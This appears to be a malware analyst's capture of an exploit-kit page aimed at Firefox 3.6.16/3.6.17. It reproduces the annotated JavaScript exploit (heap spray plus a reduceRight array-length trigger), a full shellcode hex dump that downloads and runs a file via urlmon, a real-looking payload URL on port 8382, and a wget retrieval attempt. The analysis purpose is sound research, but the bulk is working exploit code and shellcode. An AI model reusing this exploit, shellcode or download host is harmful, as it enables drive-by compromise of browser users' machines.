-----------------------------
Firefox user-agent test for the Orange EK;
It is confirmed that the mess it drops is adjusted to my Firefox browser
-----------------------------
// Three document.write() calls whose string arguments are empty or broken in
// this capture (the first one even spans a line break), so the injected markup
// is not recoverable here. NOTE(review): the element with id 'd' looked up
// below was presumably written by one of them — unverifiable from this dump.
document.write("
");
document.write("");
document.write("");
// Looked up once and never referenced again anywhere in the visible script.
var myobject = document.getElementById('d');
// Returns the download URL in an obfuscated form: decimal numbers separated by
// '!', each one less than the ASCII code of the character it stands for
// (103,115,115,111,57,46,46 -> 104,116,116,112,58,47,47 -> "http://").
// Decoded in full it is the diesel.thehickorymotormile.com:8382/oshPbY URL
// listed under "target" further down this page; this copy's query ends in
// fid=26, whereas the copy embedded in the shellcode and the "target" line
// end in fid=2. spray() packs the raw, still-encoded string — not the
// decoded URL — into the shellcode via myescape(), so the +1 decoding is
// presumably done by the shellcode itself (not analysed on this page).
// The string literal below is broken across lines in this capture.
function GetUrl(){
return "
103!115!115!111!57!46!46!99!104!100!114!100!107!45!115!103!100!103!104!98!106!110!113!120!
108!110!115!110!113!108!104!107!100!45!98!110!108!57!55!50!55!49!46!110!114!103!79!97!88!6
2!100!119!111!104!99!60!48!50!37!101!104!99!60!49!53";
}
;
// Packs a string of 8-bit character codes into a "%uXXXX" escape string, two
// characters per UTF-16 code unit, low byte first: for each pair
// (input[i], input[i+1]) it emits '%u' + hex(input[i+1]) + hex(input[i]).
// An odd trailing character gets 0xff as its partner; an even-length input
// gets a final '%uffff'. unescape() of the result therefore yields code units
// whose little-endian byte layout is the original bytes followed by one or
// two 0xff terminator bytes.
// toString(16) is not zero-padded, so the output is only well-formed for
// codes in 0x10..0xff — which holds for the digits and '!' GetUrl() returns.
// Side effects: 'ff' and 'f' are assigned without var and become globals;
// 'ff' is never read, and 'f' is reassigned by the trigger code below.
function myescape(input){
var output = '';
ff = 255;
f = 0;
// f = 1 marks an odd-length input (no '%uffff' appended at the end).
if (input.length % 2){
f = 1;
}
for (var i = 0; i < input.length; i += 2){
output += '%u';
// Last character of an odd-length input: pair it with 0xff.
if (i == (input.length - 1)){
output += 'ff';
}
else {
output = output + input.charCodeAt(i + 1).toString(16);
}
output += input.charCodeAt(i).toString(16);
}
if (!f){
output = output + '%uffff';
}
return output;
}
;
// Builds the heap-spray strings used by the trigger below. Every piece is
// assembled from "%u" escape strings (broken across lines in this capture).
function spray(){
// Pointer/structure block placed at the front of every sprayed chunk.
var ptrs = unescape("
%u0000%u0048%u0c00%u5864%u704e%u5349%u587a%u4157%u6844%u564a%u5143%u4359%u7674%u666c%u6a71
%u5174%u4a69%u414e%u4166%u0000%u26f0%u104c%u5846%u426e%u0000%u240c%u3410%u007c%u0c00%u5326
%u1005%u6379%u624a%u7959%u694f%u4663%u4445%u4261%u574b%u6666%u4d71%u7148%u4153%u4b47%u4244
%u6f72%u5942%u655a%u784e%u4a66%u6a68%u4c67%u7879%u002e%u0c00");
// Code-unit counts trimmed off the 0x7fa00 chunk size below: 9 and 1.
var bheader = 0x12 / 2;
var nullt = 0x2 / 2;
// Shellcode. Its bytes are the hex dump listed further down this page (that
// dump starts eb 5e 5f 33 c0 99 exactly like this string and ends in the
// text "expid=13&fid=2"). myescape(GetUrl()) appends the '!'-encoded
// download URL, 0xff-terminated, directly after it.
var scode = unescape("
%u5eeb%u335f%u99c0%u6a50%ub201%u5745%uf78b%u23b2%udf8b%uda03%u46b2%uda03%ub253%u030a%u8bda
%uaafb%u8b5b%u50fe%u5750%u45b2%ufa03%ub2aa%u0323%ub2fa%u030b%u80fa%u003f%u0175%u5747%u5050
%ub057%u66ff%uffb9%uf2ff%u4fae%u07c6%u5f00%u8b58%ub2fe%u0346%u53fa%uc68b%u5e05%u0000%u5000
%u5656%u466a%u02eb%u79eb%u6a57%u5930%u8b64%u8b01%u0c40%u688b%u8b1c%u085d%u6d8b%u5500%u438b
%u8b3c%u1844%u0b78%u74c0%u8d31%u1874%uad18%uad91%uc303%uad50%u3c8d%uad03%u2c8d%u8b03%u8f74
%u03fc%u33f3%u33c0%u99d2%u03ac%uc1d0%u05c2%u7948%u8bf7%u2474%u3b08%u7416%ue206%u58e2%ueb5d
%u58ba%ub70f%u4d54%u03fe%u901c%u5f5d%ud3ff%uebab%u579d%u7c8b%u0824%u6650%uffb8%uf200%u4fae
%uc033%u0788%u5f58%u04c2%ue800%uff22%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff
%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff
%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%u1529%u54d2%ufabd
%u4c58%u70cc%u6b77%uf259%u23cb%u6664%u11b4%u1fb1%u1a3e%u6363%u6363%u6363%u652e%u6578%u7500
%u6c72%u6f6d%u2e6e%u6c64%uff6c%u7468%u7074%u2f3a%u642f%u6569%u6573%u2e6c%u6874%u6865%u6369
%u6f6b%u7972%u6f6d%u6f74%u6d72%u6c69%u2e65%u6f63%u3a6d%u3338%u3238%u6f2f%u6873%u6250%u3f59
%u7865%u6970%u3d64%u3331%u6626%u6469%u323d%u36") + unescape(myescape(GetUrl()));
// Fixed prefix followed by the shellcode.
var payload = unescape("
%u6c6e%u706c%u454d%u7453%u4a45%u7554%u616b%u6561%u526f%u7573%u1806%u101f%u828c%u1083%u0d7b
%u103e%u8002%u102d%u876b%u1003%u0001%u1004%u0001%u0000%u6917%u104e%u1000%u0000%uc000%u102a
%u0040%u0000%u0005%u102e%uc001%u102a%u1806%u101f%u9090%u9090%u3401%u102b%u9090%u9090") +
scode;
// Padding of repeated 0x0c0c code units, doubled until at least 0x7fa00 long.
var tr_padding = unescape("%u0c0c%u0c0c");
while (tr_padding.length < 0x7fa00){
tr_padding += tr_padding;
}
// One chunk is ptrs + payload + padding, cut to 0x7fa00 - 9 - 1 code units.
var dummy = ptrs + payload + tr_padding;
var hspray = dummy.substring(0, 0x7fa00 - bheader - nullt);
// HeapBlocks and the loop index i are implicit globals. Each element is
// undefined before '+=', so what is actually stored is the text "undefined"
// followed by hspray, 0x100 times over.
HeapBlocks = new Array();
for (i = 0; i < 0x100; i ++ ){
HeapBlocks[i] += hspray;
}
}
;
// Trigger. Runs only when the user-agent string contains "Firefox/3.6.16" or
// "Firefox/3.6.17" (plain substring match, so every other build is skipped):
// it sprays the heap, then calls reduceRight on an Array with no elements
// whose length has been set to 2197815302 (above 2^31). The callback only
// alerts element zero of its second argument (the current element). On a
// spec-conforming engine the callback never runs for an element-less array
// when an initial value is given, so this relies on a reduceRight defect in
// those two builds — the page does not identify the bug itself.
// obj and f are implicit globals; the extra arguments 2 and 3 passed to
// reduceRight are ignored.
if ((navigator.userAgent.indexOf("Firefox/3.6.16") != - 1) || (navigator.userAgent.
indexOf("Firefox/3.6.17") != - 1)){
spray();
obj = new Array();
obj.length = 2197815302;
f = function trigger(prev, myobj, indx, array){
alert(myobj[0]);
}
;
obj.reduceRight(f, 1, 2, 3);
}
-----------------------------
Generating java applet:
-----------------------------
↑There goes the exploit
-----------------------------
Popping the shellcode below:
-----------------------------
eb 5e 5f 33 c0 99 50 6a 01 b2 45 57 8b f7 b2 23
8b df 03 da b2 46 03 da 53 b2 0a 03 da 8b fb aa
5b 8b fe 50 50 57 b2 45 03 fa aa b2 23 03 fa b2
0b 03 fa 80 3f 00 75 01 47 57 50 50 57 b0 ff 66
b9 ff ff f2 ae 4f c6 07 00 5f 58 8b fe b2 46 03
fa 53 8b c6 05 5e 00 00 00 50 56 56 6a 46 eb 02
eb 79 57 6a 30 59 64 8b 01 8b 40 0c 8b 68 1c 8b
5d 08 8b 6d 00 55 8b 43 3c 8b 44 18 78 0b c0 74
31 8d 74 18 18 ad 91 ad 03 c3 50 ad 8d 3c 03 ad
8d 2c 03 8b 74 8f fc 03 f3 33 c0 33 d2 99 ac 03
d0 c1 c2 05 48 79 f7 8b 74 24 08 3b 16 74 06 e2
e2 58 5d eb ba 58 0f b7 54 4d fe 03 1c 90 5d 5f
ff d3 ab eb 9d 57 8b 7c 24 08 50 66 b8 ff 00 f2
ae 4f 33 c0 88 07 58 5f c2 04 00 e8 22 ff ff ff
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff 29 15 d2 54 bd fa 58 4c cc 70
77 6b 59 f2 cb 23 64 66 b4 11 b1 1f 3e 1a 63 63
63 63 63 63 2e 65 78 65 00 75 72 6c 6d 6f 6e 2e
64 6c 6c ff 68 74 74 70 3a 2f 2f 64 69 65 73 65
6c 2e 74 68 65 68 69 63 6b 6f 72 79 6d 6f 74 6f
72 6d 69 6c 65 2e 63 6f 6d 3a 38 33 38 32 2f 6f
73 68 50 62 59 3f 65 78 70 69 64 3d 31 33 26 66
69 64 3d 32
-----------------------------
Uses kernel.dll & urlmon.dll
-----------------------------
target:
http://diesel.thehickorymotormile.com:8382/oshPbY?expid=13&fid=2
-----------------------------
Download attempt...
-----------------------------
--19:26:05-- http://diesel.thehickorymotormile.com:8382/oshPbY?expid=13
=> `oshPbY@expid=13'
Resolving diesel.thehickorymotormile.com... 173.212.222.188
Connecting to diesel.thehickorymotormile.com|173.212.222.188|:8382... connected.
HTTP request sent, awaiting response... 502 Bad Gateway
-----------------------------
Looks like the URL has expired :-))
-----------------------------